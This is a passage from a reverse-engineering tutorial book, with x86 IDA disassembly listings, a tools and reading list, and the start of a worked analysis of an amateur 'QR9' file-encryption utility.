; ---------------------------------------------------------------------------
loc_80485EB: ; CODE XREF: f+209
mov edx, [ebp+var_124]
sub edx, ebx
cmp edx, [ebp+var_130]
jbe short loc_804862E
cmp eax, edx
mov edx, [ebp+var_11C]
lea eax, [edx+8]
jle short loc_8048617
mov [edx], esi
mov esi, ebx
mov [edx+4], edi
mov [ebp+var_11C], eax
jmp short loc_8048634
; ---------------------------------------------------------------------------
loc_8048617: ; CODE XREF: f+252
mov ecx, [ebp+var_11C]
mov [ebp+var_11C], eax
mov [ecx], ebx
mov ebx, [ebp+var_124]
mov [ecx+4], ebx
loc_804862E: ; CODE XREF: f+245
mov [ebp+var_124], edi
loc_8048634: ; CODE XREF: f+21B
; f+235 ...
mov eax, [ebp+var_14C]
cmp [ebp+var_11C], eax
/one.pnum/eight.pnum/seven.pnum
ja loc_8048433
mov ebx, [ebp+var_120]
loc_804864C: ; CODE XREF: f+2A
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_130]
dec eax
imul eax, ebx
add eax, [ebp+arg_0]
cmp ecx, eax
mov [ebp+var_120], eax
jbe short loc_804866B
mov ecx, eax
loc_804866B: ; CODE XREF: f+2B3
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_0]
add esi, ebx
mov edx, esi
jmp short loc_80486A3
; ---------------------------------------------------------------------------
loc_8048677: ; CODE XREF: f+2F1
push eax
push [ebp+arg_10]
mov [ebp+var_138], edx
mov [ebp+var_13C], ecx
push edi
push edx
call [ebp+arg_C]
add esp, 10h
mov edx, [ebp+var_138]
mov ecx, [ebp+var_13C]
test eax, eax
jns short loc_80486A1
mov edi, edx
loc_80486A1: ; CODE XREF: f+2E9
add edx, ebx
loc_80486A3: ; CODE XREF: f+2C1
cmp edx, ecx
jbe short loc_8048677
cmp edi, [ebp+arg_0]
jz loc_8048762
xor eax, eax
loc_80486B2: ; CODE XREF: f+313
mov ecx, [ebp+arg_0]
mov dl, [edi+eax]
mov cl, [ecx+eax]
mov [edi+eax], cl
mov ecx, [ebp+arg_0]
mov [ecx+eax], dl
inc eax
cmp ebx, eax
jnz short loc_80486B2
jmp loc_8048762
; ---------------------------------------------------------------------------
loc_80486CE: ; CODE XREF: f+3C3
lea edx, [esi+edi]
jmp short loc_80486D5
; ---------------------------------------------------------------------------
/one.pnum/eight.pnum/eight.pnum
loc_80486D3: ; CODE XREF: f+33B
add edx, edi
loc_80486D5: ; CODE XREF: f+31D
push eax
push [ebp+arg_10]
mov [ebp+var_138], edx
push edx
push esi
call [ebp+arg_C]
add esp, 10h
mov edx, [ebp+var_138]
test eax, eax
js short loc_80486D3
add edx, ebx
cmp edx, esi
mov [ebp+var_124], edx
jz short loc_804876F
mov edx, [ebp+var_134]
lea eax, [esi+ebx]
add edx, eax
mov [ebp+var_11C], edx
jmp short loc_804875B
; ---------------------------------------------------------------------------
loc_8048710: ; CODE XREF: f+3AA
mov cl, [eax]
mov edx, [ebp+var_11C]
mov [ebp+var_150], eax
mov byte ptr [ebp+var_130], cl
mov ecx, eax
jmp short loc_8048733
; ---------------------------------------------------------------------------
loc_8048728: ; CODE XREF: f+391
mov al, [edx+ebx]
mov [ecx], al
mov ecx, [ebp+var_128]
loc_8048733: ; CODE XREF: f+372
mov [ebp+var_128], edx
add edx, edi
mov eax, edx
sub eax, edi
cmp [ebp+var_124], eax
jbe short loc_8048728
mov dl, byte ptr [ebp+var_130]
mov eax, [ebp+var_150]
mov [ecx], dl
dec [ebp+var_11C]
loc_804875B: ; CODE XREF: f+35A
dec eax
cmp eax, esi
jnb short loc_8048710
jmp short loc_804876F
; ---------------------------------------------------------------------------
loc_8048762: ; CODE XREF: f+2F6
; f+315
mov edi, ebx
neg edi
lea ecx, [edi-1]
mov [ebp+var_134], ecx
loc_804876F: ; CODE XREF: f+347
/one.pnum/eight.pnum/nine.pnum
; f+3AC
add esi, ebx
cmp esi, [ebp+var_120]
jbe loc_80486CE
loc_804877D: ; CODE XREF: f+13
lea esp, [ebp-0Ch]
pop ebx
pop esi
pop edi
pop ebp
retn
f endp
/four.pnum./three.pnum crackme / keygenme
Couple of my keygenmes/two.pnum:
http://crackmes.de/users/yonkie/
/two.pnumprogram which imitates fictional so/f_tware protection, for which one need to make a keys/licenses generator
/one.pnum/nine.pnum/zero.pnum
Chapter /five.pnum
Tools
∙IDA as disassembler. Older freeware version is available for downloading: http://www.hex-rays.com/
idapro/idadownfreeware.htm .
∙Microso/f_t Visual Studio Express/one.pnum: Stripped-down Visual Studio version, convenient for simple expreiments.
∙Hiew/two.pnumfor small modifications of code in binary files.
/five.pnum./zero.pnum./one.pnum Debugger
tracer/three.pnuminstead of debugger.
I stopped to use debugger eventually, because all I need from it is to spot some function’s arguments while
execution, or registers’ state at some point. To load debugger each time is too much, so I wrote a small utility tracer .
It has console-interface, working from command-line, allow to intercept function execution, set breakpoints at
arbitrary places, spot registers’ state, modify it, etc.
However, as for learning, it’s highly advisable to trace code in debugger manually, watch how register’s state
changing (for example, classic So/f_tICE, OllyDbg, WinDbg highlighting changed registers), flags, data, change them
manually, watch reaction, etc.
/one.pnumhttp://www.microsoft.com/express/Downloads/
/two.pnumhttp://www.hiew.ru/
/three.pnumhttp://conus.info/gt/
/one.pnum/nine.pnum/one.pnum
Chapter /six.pnum
Books/blogs worth reading
/six.pnum./one.pnum Books
/six.pnum./one.pnum./one.pnum Windows
∙Windows R○Internals (Mark E. Russinovich and David A. Solomon with Alex Ionescu)/one.pnum
/six.pnum./one.pnum./two.pnum C/C++
∙C++ language standard: ISO/IEC /one.pnum/four.pnum/eight.pnum/eight.pnum/two.pnum:/two.pnum/zero.pnum/zero.pnum/three.pnum/two.pnum
/six.pnum./one.pnum./three.pnum x/eight.pnum/six.pnum / x/eight.pnum/six.pnum-/six.pnum/four.pnum
∙Intel manuals: http://www.intel.com/products/processor/manuals/
∙AMD manuals: http://developer.amd.com/documentation/guides/Pages/default.aspx#manuals
/six.pnum./one.pnum./four.pnum ARM
ARM manuals: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.subset.architecture.
reference/index.html
/six.pnum./two.pnum Blogs
/six.pnum./two.pnum./one.pnum Windows
∙Microso/f_t: Raymond Chen
∙http://www.nynaeve.net/
/one.pnumhttp://www.microsoft.com/learning/en/us/book.aspx?ID=12069&locale=en-us
/two.pnumhttp://www.iso.org/iso/catalogue_detail.htm?csnumber=38110
/one.pnum/nine.pnum/two.pnum
Chapter /seven.pnum
More examples
/seven.pnum./one.pnum “QR/nine.pnum”: Rubik’s cube inspired amateur crypto-algorithm
Sometimes amateur cryptosystems appear to be pretty bizarre.
I was asked to revese engineer an amateur cryptoalgorithm of some data crypting utility, source code of which
was lost/one.pnum.
Here is also IDA /five.pnum exported listing from original crypting utility:
.text:00541000 set_bit proc near ; CODE XREF: rotate1+42
.text:00541000 ; rotate2+42 ...
.text:00541000
.text:00541000 arg_0 = dword ptr 4
.text:00541000 arg_4 = dword ptr 8
.text:00541000 arg_8 = dword ptr 0Ch
.text:00541000 arg_C = byte ptr 10h
.text:00541000
.text:00541000 mov al, [esp+arg_C]
.text:00541004 mov ecx, [esp+arg_8]
.text:00541008 push esi
.text:00541009 mov esi, [esp+4+arg_0]
.text:0054100D test al, al
.text:0054100F mov eax, [esp+4+arg_4]
.text:00541013 mov dl, 1
.text:00541015 jz short loc_54102B
.text:00541017 shl dl, cl
.text:00541019 mov cl, cube64[eax+esi*8]
.text:00541020 or cl, dl
.text:00541022 mov cube64[eax+esi*8], cl
.text:00541029 pop esi
.text:0054102A retn
.text:0054102B ; ---------------------------------------------------------------------------
.text:0054102B
.text:0054102B loc_54102B: ; CODE XREF: set_bit+15
.text:0054102B shl dl, cl
.text:0054102D mov cl, cube64[eax+esi*8]
.text:00541034 not dl
.text:00541036 and cl, dl
.text:00541038 mov cube64[eax+esi*8], cl
.text:0054103F pop esi
.text:00541040 retn
.text:00541040 set_bit endp
.text:00541040
.text:00541040 ; ---------------------------------------------------------------------------
.text:00541041 align 10h
.text:00541050
.text:00541050 ; =============== S U B R O U T I N E =======================================
.text:00541050
.text:00541050
/one.pnumI also got permit from customer to publish the algorithm details
/one.pnum/nine.pnum/three.pnum
.text:00541050 get_bit proc near ; CODE XREF: rotate1+16
.text:00541050 ; rotate2+16 ...
.text:00541050
.text:00541050 arg_0 = dword ptr 4
.text:00541050 arg_4 = dword ptr 8
.text:00541050 arg_8 = byte ptr 0Ch
.text:00541050
.text:00541050 mov eax, [esp+arg_4]
.text:00541054 mov ecx, [esp+arg_0]
.text:00541058 mov al, cube64[eax+ecx*8]
.text:0054105F mov cl, [esp+arg_8]
.text:00541063 shr al, cl
.text:00541065 and al, 1
.text:00541067 retn
.text:00541067 get_bit endp
.text:00541067
.text:00541067 ; ---------------------------------------------------------------------------
.text:00541068 align 10h
.text:00541070
.text:00541070 ; =============== S U B R O U T I N E =======================================
.text:00541070
.text:00541070
.text:00541070 rotate1 proc near ; CODE XREF: rotate_all_with_password+8E
.text:00541070
.text:00541070 internal_array_64= byte ptr -40h
.text:00541070 arg_0 = dword ptr 4
.text:00541070
.text:00541070 sub esp, 40h
.text:00541073 push ebx
.text:00541074 push ebp
.text:00541075 mov ebp, [esp+48h+arg_0]
.text:00541079 push esi
.text:0054107A push edi
.text:0054107B xor edi, edi ; EDI is loop1 counter
.text:0054107D lea ebx, [esp+50h+internal_array_64]
.text:00541081
.text:00541081 first_loop1_begin: ; CODE XREF: rotate1+2E
.text:00541081 xor esi, esi ; ESI is loop2 counter
.text:00541083
.text:00541083 first_loop2_begin: ; CODE XREF: rotate1+25
.text:00541083 push ebp ; arg_0
.text:00541084 push esi
.text:00541085 push edi
.text:00541086 call get_bit
.text:0054108B add esp, 0Ch
.text:0054108E mov [ebx+esi], al ; store to internal array
.text:00541091 inc esi
.text:00541092 cmp esi, 8
.text:00541095 jl short first_loop2_begin
.text:00541097 inc edi
.text:00541098 add ebx, 8
.text:0054109B cmp edi, 8
.text:0054109E jl short first_loop1_begin
.text:005410A0 lea ebx, [esp+50h+internal_array_64]
.text:005410A4 mov edi, 7 ; EDI is loop1 counter, initial state is 7
.text:005410A9
.text:005410A9 second_loop1_begin: ; CODE XREF: rotate1+57
.text:005410A9 xor esi, esi ; ESI is loop2 counter
.text:005410AB
.text:005410AB second_loop2_begin: ; CODE XREF: rotate1+4E
.text:005410AB mov al, [ebx+esi] ; value from internal array
.text:005410AE push eax
.text:005410AF push ebp ; arg_0
.text:005410B0 push edi
.text:005410B1 push esi
.text:005410B2 call set_bit
/one.pnum/nine.pnum/four.pnum
.text:005410B7 add esp, 10h
.text:005410BA inc esi ; increment loop2 counter
.text:005410BB cmp esi, 8
.text:005410BE jl short second_loop2_begin
.text:005410C0 dec edi ; decrement loop2 counter
.text:005410C1 add ebx, 8
.text:005410C4 cmp edi, 0FFFFFFFFh
.text:005410C7 jg short second_loop1_begin
.text:005410C9 pop edi
.text:005410CA pop esi
.text:005410CB pop ebp
.text:005410CC pop ebx
.text:005410CD add esp, 40h
.text:005410D0 retn
.text:005410D0 rotate1 endp
.text:005410D0
.text:005410D0 ; ---------------------------------------------------------------------------
.text:005410D1 align 10h
.text:005410E0
.text:005410E0 ; =============== S U B R O U T I N E =======================================
.text:005410E0
.text:005410E0
.text:005410E0 rotate2 proc near ; CODE XREF: rotate_all_with_password+7A
.text:005410E0
.text:005410E0 internal_array_64= byte ptr -40h
.text:005410E0 arg_0 = dword ptr 4
.text:005410E0
.text:005410E0 sub esp, 40h
.text:005410E3 push ebx
.text:005410E4 push ebp
.text:005410E5 mov ebp, [esp+48h+arg_0]
.text:005410E9 push esi
.text:005410EA push edi
.text:005410EB xor edi, edi ; loop1 counter
.text:005410ED lea ebx, [esp+50h+internal_array_64]
.text:005410F1
.text:005410F1 loc_5410F1: ; CODE XREF: rotate2+2E
.text:005410F1 xor esi, esi ; loop2 counter
.text:005410F3
.text:005410F3 loc_5410F3: ; CODE XREF: rotate2+25
.text:005410F3 push esi ; loop2
.text:005410F4 push edi ; loop1
.text:005410F5 push ebp ; arg_0
.text:005410F6 call get_bit
.text:005410FB add esp, 0Ch
.text:005410FE mov [ebx+esi], al ; store to internal array
.text:00541101 inc esi ; increment loop1 counter
.text:00541102 cmp esi, 8
.text:00541105 jl short loc_5410F3
.text:00541107 inc edi ; increment loop2 counter
.text:00541108 add ebx, 8
.text:0054110B cmp edi, 8
.text:0054110E jl short loc_5410F1
.text:00541110 lea ebx, [esp+50h+internal_array_64]
.text:00541114 mov edi, 7 ; loop1 counter is initial state 7
.text:00541119
.text:00541119 loc_541119: ; CODE XREF: rotate2+57
.text:00541119 xor esi, esi ; loop2 counter
.text:0054111B
.text:0054111B loc_54111B: ; CODE XREF: rotate2+4E
.text:0054111B mov al, [ebx+esi] ; get byte from internal array
.text:0054111E push eax
.text:0054111F push edi ; loop1 counter
.text:00541120 push esi ; loop2 counter
.text:00541121 push ebp ; arg_0
.text:00541122 call set_bit
/one.pnum/nine.pnum/five.pnum
.text:00541127 add esp, 10h
.text:0054112A inc esi ; increment loop2 counter
.text:0054112B cmp esi, 8
.text:0054112E jl short loc_54111B
.text:00541130 dec edi ; decrement loop2 counter
.text:00541131 add ebx, 8
.text:00541134 cmp edi, 0FFFFFFFFh
.text:00541137 jg short loc_541119
.text:00541139 pop edi
.text:0054113A pop esi
.text:0054113B pop ebp
.text:0054113C pop ebx
.text:0054113D add esp, 40h
.text:00541140 retn
.text:00541140 rotate2 endp
.text:00541140
.text:00541140 ; ---------------------------------------------------------------------------
.text:00541141 align 10h
.text:00541150
.text:00541150 ; =============== S U B R O U T I N E =======================================
.text:00541150
.text:00541150
.text:00541150 rotate3 proc near ; CODE XREF: rotate_all_with_password+66
.text:00541150
.text:00541150 var_40 = byte ptr -40h
.text:00541150 arg_0 = dword ptr 4
.text:00541150
.text:00541150 sub esp, 40h
.text:00541153 push ebx
.text:00541154 push ebp
.text:00541155 mov ebp, [esp+48h+arg_0]
.text:00541159 push esi
.text:0054115A push edi
.text:0054115B xor edi, edi
.text:0054115D lea ebx, [esp+50h+var_40]
.text:00541161
.text:00541161 loc_541161: ; CODE XREF: rotate3+2E
.text:00541161 xor esi, esi
.text:00541163
.text:00541163 loc_541163: ; CODE XREF: rotate3+25
.text:00541163 push esi
.text:00541164 push ebp
.text:00541165 push edi
.text:00541166 call get_bit
.text:0054116B add esp, 0Ch
.text:0054116E mov [ebx+esi], al
.text:00541171 inc esi
.text:00541172 cmp esi, 8
.text:00541175 jl short loc_541163
.text:00541177 inc edi
.text:00541178 add ebx, 8
.text:0054117B cmp edi, 8
.text:0054117E jl short loc_541161
.text:00541180 xor ebx, ebx
.text:00541182 lea edi, [esp+50h+var_40]
.text:00541186
.text:00541186 loc_541186: ; CODE XREF: rotate3+54
.text:00541186 mov esi, 7
.text:0054118B
.text:0054118B loc_54118B: ; CODE XREF: rotate3+4E
.text:0054118B mov al, [edi]
.text:0054118D push eax
.text:0054118E push ebx
.text:0054118F push ebp
.text:00541190 push esi
.text:00541191 call set_bit
/one.pnum/nine.pnum/six.pnum
.text:00541196 add esp, 10h
.text:00541199 inc edi
.text:0054119A dec esi
.text:0054119B cmp esi, 0FFFFFFFFh
.text:0054119E jg short loc_54118B
.text:005411A0 inc ebx
.text:005411A1 cmp ebx, 8
.text:005411A4 jl short loc_541186
.text:005411A6 pop edi
.text:005411A7 pop esi
.text:005411A8 pop ebp
.text:005411A9 pop ebx
.text:005411AA add esp, 40h
.text:005411AD retn
.text:005411AD rotate3 endp
.text:005411AD
.text:005411AD ; ---------------------------------------------------------------------------
.text:005411AE align 10h
.text:005411B0
.text:005411B0 ; =============== S U B R O U T I N E =======================================
.text:005411B0
.text:005411B0
.text:005411B0 rotate_all_with_password proc near ; CODE XREF: crypt+1F
.text:005411B0 ; decrypt+36
.text:005411B0
.text:005411B0 arg_0 = dword ptr 4
.text:005411B0 arg_4 = dword ptr 8
.text:005411B0
.text:005411B0 mov eax, [esp+arg_0]
.text:005411B4 push ebp
.text:005411B5 mov ebp, eax
.text:005411B7 cmp byte ptr [eax], 0
.text:005411BA jz exit
.text:005411C0 push ebx
.text:005411C1 mov ebx, [esp+8+arg_4]
.text:005411C5 push esi
.text:005411C6 push edi
.text:005411C7
.text:005411C7 loop_begin: ; CODE XREF: rotate_all_with_password+9F
.text:005411C7 movsx eax, byte ptr [ebp+0]
.text:005411CB push eax ; C
.text:005411CC call _tolower
.text:005411D1 add esp, 4
.text:005411D4 cmp al, ’a’
.text:005411D6 jl short next_character_in_password
.text:005411D8 cmp al, ’z’
.text:005411DA jg short next_character_in_password
.text:005411DC movsx ecx, al
.text:005411DF sub ecx, ’a’
.text:005411E2 cmp ecx, 24
.text:005411E5 jle short skip_subtracting
.text:005411E7 sub ecx, 24
.text:005411EA
.text:005411EA skip_subtracting: ; CODE XREF: rotate_all_with_password+35
.text:005411EA mov eax, 55555556h
.text:005411EF imul ecx
.text:005411F1 mov eax, edx
.text:005411F3 shr eax, 1Fh
.text:005411F6 add edx, eax
.text:005411F8 mov eax, ecx
.text:005411FA mov esi, edx
.text:005411FC mov ecx, 3
.text:00541201 cdq
.text:00541202 idiv ecx
.text:00541204 sub edx, 0
.text:00541207 jz short call_rotate1
/one.pnum/nine.pnum/seven.pnum
.text:00541209 dec edx
.text:0054120A jz short call_rotate2
.text:0054120C dec edx
.text:0054120D jnz short next_character_in_password
.text:0054120F test ebx, ebx
.text:00541211 jle short next_character_in_password
.text:00541213 mov edi, ebx
.text:00541215
.text:00541215 call_rotate3: ; CODE XREF: rotate_all_with_password+6F
.text:00541215 push esi
.text:00541216 call rotate3
.text:0054121B add esp, 4
.text:0054121E dec edi
.text:0054121F jnz short call_rotate3
.text:00541221 jmp short next_character_in_password
.text:00541223 ; ---------------------------------------------------------------------------
.text:00541223
.text:00541223 call_rotate2: ; CODE XREF: rotate_all_with_password+5A
.text:00541223 test ebx, ebx
.text:00541225 jle short next_character_in_password
.text:00541227 mov edi, ebx
.text:00541229
.text:00541229 loc_541229: ; CODE XREF: rotate_all_with_password+83
.text:00541229 push esi
.text:0054122A call rotate2
.text:0054122F add esp, 4
.text:00541232 dec edi
.text:00541233 jnz short loc_541229
.text:00541235 jmp short next_character_in_password
.text:00541237 ; ---------------------------------------------------------------------------
.text:00541237
.text:00541237 call_rotate1: ; CODE XREF: rotate_all_with_password+57
.text:00541237 test ebx, ebx
.text:00541239 jle short next_character_in_password
.text:0054123B mov edi, ebx
.text:0054123D
.text:0054123D loc_54123D: ; CODE XREF: rotate_all_with_password+97
.text:0054123D push esi
.text:0054123E call rotate1
.text:00541243 add esp, 4
.text:00541246 dec edi
.text:00541247 jnz short loc_54123D
.text:00541249
.text:00541249 next_character_in_password: ; CODE XREF: rotate_all_with_password+26
.text:00541249 ; rotate_all_with_password+2A ...
.text:00541249 mov al, [ebp+1]
.text:0054124C inc ebp
.text:0054124D test al, al
.text:0054124F jnz loop_begin
.text:00541255 pop edi
.text:00541256 pop esi
.text:00541257 pop ebx
.text:00541258
.text:00541258 exit: ; CODE XREF: rotate_all_with_password+A
.text:00541258 pop ebp
.text:00541259 retn
.text:00541259 rotate_all_with_password endp
.text:00541259
.text:00541259 ; ---------------------------------------------------------------------------
.text:0054125A align 10h
.text:00541260
.text:00541260 ; =============== S U B R O U T I N E =======================================
.text:00541260
.text:00541260
.text:00541260 crypt proc near ; CODE XREF: crypt_file+8A
.text:00541260
/one.pnum/nine.pnum/eight.pnum
.text:00541260 arg_0 = dword ptr 4
.text:00541260 arg_4 = dword ptr 8
.text:00541260 arg_8 = dword ptr 0Ch
.text:00541260
.text:00541260 push ebx
.text:00541261 mov ebx, [esp+4+arg_0]
.text:00541265 push ebp
.text:00541266 push esi
.text:00541267 push edi
.text:00541268 xor ebp, ebp
.text:0054126A
.text:0054126A loc_54126A: ; CODE XREF: crypt+41
.text:0054126A mov eax, [esp+10h+arg_8]
.text:0054126E mov ecx, 10h
.text:00541273 mov esi, ebx
.text:00541275 mov edi, offset cube64
.text:0054127A push 1
.text:0054127C push eax
.text:0054127D rep movsd
.text:0054127F call rotate_all_with_password
.text:00541284 mov eax, [esp+18h+arg_4]
.text:00541288 mov edi, ebx
.text:0054128A add ebp, 40h
.text:0054128D add esp, 8
.text:00541290 mov ecx, 10h
.text:00541295 mov esi, offset cube64
.text:0054129A add ebx, 40h
.text:0054129D cmp ebp, eax
.text:0054129F rep movsd
.text:005412A1 jl short loc_54126A
.text:005412A3 pop edi
.text:005412A4 pop esi
.text:005412A5 pop ebp
.text:005412A6 pop ebx
.text:005412A7 retn
.text:005412A7 crypt endp
.text:005412A7
.text:005412A7 ; ---------------------------------------------------------------------------
.text:005412A8 align 10h
.text:005412B0
.text:005412B0 ; =============== S U B R O U T I N E =======================================
.text:005412B0
.text:005412B0
.text:005412B0 ; int __cdecl decrypt(int, int, void *Src)
.text:005412B0 decrypt proc near ; CODE XREF: decrypt_file+99
.text:005412B0
.text:005412B0 arg_0 = dword ptr 4
.text:005412B0 arg_4 = dword ptr 8
.text:005412B0 Src = dword ptr 0Ch
.text:005412B0
.text:005412B0 mov eax, [esp+Src]
.text:005412B4 push ebx
.text:005412B5 push ebp
.text:005412B6 push esi
.text:005412B7 push edi
.text:005412B8 push eax ; Src
.text:005412B9 call __strdup
.text:005412BE push eax ; Str
.text:005412BF mov [esp+18h+Src], eax
.text:005412C3 call __strrev
.text:005412C8 mov ebx, [esp+18h+arg_0]
.text:005412CC add esp, 8
.text:005412CF xor ebp, ebp
.text:005412D1
.text:005412D1 loc_5412D1: ; CODE XREF: decrypt+58
.text:005412D1 mov ecx, 10h
/one.pnum/nine.pnum/nine.pnum
.text:005412D6 mov esi, ebx
.text:005412D8 mov edi, offset cube64
.text:005412DD push 3
.text:005412DF rep movsd
.text:005412E1 mov ecx, [esp+14h+Src]
.text:005412E5 push ecx
.text:005412E6 call rotate_all_with_password
.text:005412EB mov eax, [esp+18h+arg_4]
.text:005412EF mov edi, ebx
.text:005412F1 add ebp, 40h
.text:005412F4 add esp, 8
.text:005412F7 mov ecx, 10h
.text:005412FC mov esi, offset cube64
.text:00541301 add ebx, 40h
.text:00541304 cmp ebp, eax
.text:00541306 rep movsd
.text:00541308 jl short loc_5412D1
.text:0054130A mov edx, [esp+10h+Src]
.text:0054130E push edx ; Memory
.text:0054130F call _free
.text:00541314 add esp, 4
.text:00541317 pop edi
.text:00541318 pop esi
.text:00541319 pop ebp
.text:0054131A pop ebx
.text:0054131B retn
.text:0054131B decrypt endp
.text:0054131B
.text:0054131B ; ---------------------------------------------------------------------------
.text:0054131C align 10h
.text:00541320
.text:00541320 ; =============== S U B R O U T I N E =======================================
.text:00541320
.text:00541320
.text:00541320 ; int __cdecl crypt_file(int Str, char *Filename, int password)
.text:00541320 crypt_file proc near ; CODE XREF: _main+42
.text:00541320
.text:00541320 Str = dword ptr 4
.text:00541320 Filename = dword ptr 8
.text:00541320 password = dword ptr 0Ch
.text:00541320
.text:00541320 mov eax, [esp+Str]
.text:00541324 push ebp
.text:00541325 push offset Mode ; "rb"
.text:0054132A push eax ; Filename
.text:0054132B call _fopen ; open file
.text:00541330 mov ebp, eax
.text:00541332 add esp, 8
.text:00541335 test ebp, ebp
.text:00541337 jnz short loc_541348
.text:00541339 push offset Format ; "Cannot open input file!\n"
.text:0054133E call _printf
.text:00541343 add esp, 4
.text:00541346 pop ebp
.text:00541347 retn
.text:00541348 ; ---------------------------------------------------------------------------
.text:00541348
.text:00541348 loc_541348: ; CODE XREF: crypt_file+17
.text:00541348 push ebx
.text:00541349 push esi
.text:0054134A push edi
.text:0054134B push 2 ; Origin
.text:0054134D push 0 ; Offset
.text:0054134F push ebp ; File
.text:00541350 call _fseek
.text:00541355 push ebp ; File
/two.pnum/zero.pnum/zero.pnum
.text:00541356 call _ftell ; get file size
.text:0054135B push 0 ; Origin
.text:0054135D push 0 ; Offset
.text:0054135F push ebp ; File
.text:00541360 mov [esp+2Ch+Str], eax
.text:00541364 call _fseek ; rewind to start
.text:00541369 mov esi, [esp+2Ch+Str]
.text:0054136D and esi, 0FFFFFFC0h ; reset all lowest 6 bits
.text:00541370 add esi, 40h ; align size to 64-byte border
.text:00541373 push esi ; Size
.text:00541374 call _malloc
.text:00541379 mov ecx, esi
.text:0054137B mov ebx, eax ; allocated buffer pointer -> to EBX
.text:0054137D mov edx, ecx
.text:0054137F xor eax, eax
.text:00541381 mov edi, ebx
.text:00541383 push ebp ; File
.text:00541384 shr ecx, 2
.text:00541387 rep stosd
.text:00541389 mov ecx, edx
.text:0054138B push 1 ; Count
.text:0054138D and ecx, 3
.text:00541390 rep stosb ; memset (buffer, 0, aligned_size)
.text:00541392 mov eax, [esp+38h+Str]
.text:00541396 push eax ; ElementSize
.text:00541397 push ebx ; DstBuf
.text:00541398 call _fread ; read file
.text:0054139D push ebp ; File
.text:0054139E call _fclose
.text:005413A3 mov ecx, [esp+44h+password]
.text:005413A7 push ecx ; password
.text:005413A8 push esi ; aligned size
.text:005413A9 push ebx ; buffer
.text:005413AA call crypt ; do crypt
.text:005413AF mov edx, [esp+50h+Filename]
.text:005413B3 add esp, 40h
.text:005413B6 push offset aWb ; "wb"
.text:005413BB push edx ; Filename
.text:005413BC call _fopen
.text:005413C1 mov edi, eax
.text:005413C3 push edi ; File
.text:005413C4 push 1 ; Count
.text:005413C6 push 3 ; Size
.text:005413C8 push offset aQr9 ; "QR9"
.text:005413CD call _fwrite ; write file signature
.text:005413D2 push edi ; File
.text:005413D3 push 1 ; Count
.text:005413D5 lea eax, [esp+30h+Str]
.text:005413D9 push 4 ; Size
.text:005413DB push eax ; Str
.text:005413DC call _fwrite ; write original file size
.text:005413E1 push edi ; File
.text:005413E2 push 1 ; Count
.text:005413E4 push esi ; Size
.text:005413E5 push ebx ; Str
.text:005413E6 call _fwrite ; write crypted file
.text:005413EB push edi ; File
.text:005413EC call _fclose
.text:005413F1 push ebx ; Memory
.text:005413F2 call _free
.text:005413F7 add esp, 40h
.text:005413FA pop edi
.text:005413FB pop esi
.text:005413FC pop ebx
.text:005413FD pop ebp
.text:005413FE retn
/two.pnum/zero.pnum/one.pnum
.text:005413FE crypt_file endp
.text:005413FE
.text:005413FE ; ---------------------------------------------------------------------------
.text:005413FF align 10h
.text:00541400
.text:00541400 ; =============== S U B R O U T I N E =======================================
.text:00541400
.text:00541400
.text:00541400 ; int __cdecl decrypt_file(char *Filename, int, void *Src)
.text:00541400 decrypt_file proc near ; CODE XREF: _main+6E
.text:00541400
.text:00541400 Filename = dword ptr 4
.text:00541400 arg_4 = dword ptr 8
.text:00541400 Src = dword ptr 0Ch
.text:00541400
.text:00541400 mov eax, [esp+Filename]
.text:00541404 push ebx
.text:00541405 push ebp
.text:00541406 push esi
.text:00541407 push edi
.text:00541408 push offset aRb ; "rb"
.text:0054140D push eax ; Filename
.text:0054140E call _fopen
.text:00541413 mov esi, eax
.text:00541415 add esp, 8
.text:00541418 test esi, esi
.text:0054141A jnz short loc_54142E
.text:0054141C push offset aCannotOpenIn_0 ; "Cannot open input file!\n"
.text:00541421 call _printf
.text:00541426 add esp, 4
.text:00541429 pop edi
.text:0054142A pop esi
.text:0054142B pop ebp
.text:0054142C pop ebx
.text:0054142D retn
.text:0054142E ; ---------------------------------------------------------------------------
.text:0054142E
.text:0054142E loc_54142E: ; CODE XREF: decrypt_file+1A
.text:0054142E push 2 ; Origin
.text:00541430 push 0 ; Offset
.text:00541432 push esi ; File
.text:00541433 call _fseek
.text:00541438 push esi ; File
.text:00541439 call _ftell
.text:0054143E push 0 ; Origin
.text:00541440 push 0 ; Offset
.text:00541442 push esi ; File
.text:00541443 mov ebp, eax
.text:00541445 call _fseek
.text:0054144A push ebp ; Size
.text:0054144B call _malloc
.text:00541450 push esi ; File
.text:00541451 mov ebx, eax
.text:00541453 push 1 ; Count
.text:00541455 push ebp ; ElementSize
.text:00541456 push ebx ; DstBuf
.text:00541457 call _fread
.text:0054145C push esi ; File
.text:0054145D call _fclose
.text:00541462 add esp, 34h
.text:00541465 mov ecx, 3
.text:0054146A mov edi, offset aQr9_0 ; "QR9"
.text:0054146F mov esi, ebx
.text:00541471 xor edx, edx
.text:00541473 repe cmpsb
.text:00541475 jz short loc_541489
/two.pnum/zero.pnum/two.pnum
.text:00541477 push offset aFileIsNotCrypt ; "File is not crypted!\n"
.text:0054147C call _printf
.text:00541481 add esp, 4
.text:00541484 pop edi
.text:00541485 pop esi
.text:00541486 pop ebp
.text:00541487 pop ebx
.text:00541488 retn
.text:00541489 ; ---------------------------------------------------------------------------
.text:00541489
.text:00541489 loc_541489: ; CODE XREF: decrypt_file+75
.text:00541489 mov eax, [esp+10h+Src]
.text:0054148D mov edi, [ebx+3]
.text:00541490 add ebp, 0FFFFFFF9h
.text:00541493 lea esi, [ebx+7]
.text:00541496 push eax ; Src
.text:00541497 push ebp ; int
.text:00541498 push esi ; int
.text:00541499 call decrypt
.text:0054149E mov ecx, [esp+1Ch+arg_4]
.text:005414A2 push offset aWb_0 ; "wb"
.text:005414A7 push ecx ; Filename
.text:005414A8 call _fopen
.text:005414AD mov ebp, eax
.text:005414AF push ebp ; File
.text:005414B0 push 1 ; Count
.text:005414B2 push edi ; Size
.text:005414B3 push esi ; Str
.text:005414B4 call _fwrite
.text:005414B9 push ebp ; File
.text:005414BA call _fclose
.text:005414BF push ebx ; Memory
.text:005414C0 call _free
.text:005414C5 add esp, 2Ch
.text:005414C8 pop edi
.text:005414C9 pop esi
.text:005414CA pop ebp
.text:005414CB pop ebx
.text:005414CC retn
.text:005414CC decrypt_file endp
All function and label names are given by me while analysis.
I started from top. Here is a function taking two file names and password.
.text:00541320 ; int __cdecl crypt_file(int Str, char *Filename, int password)
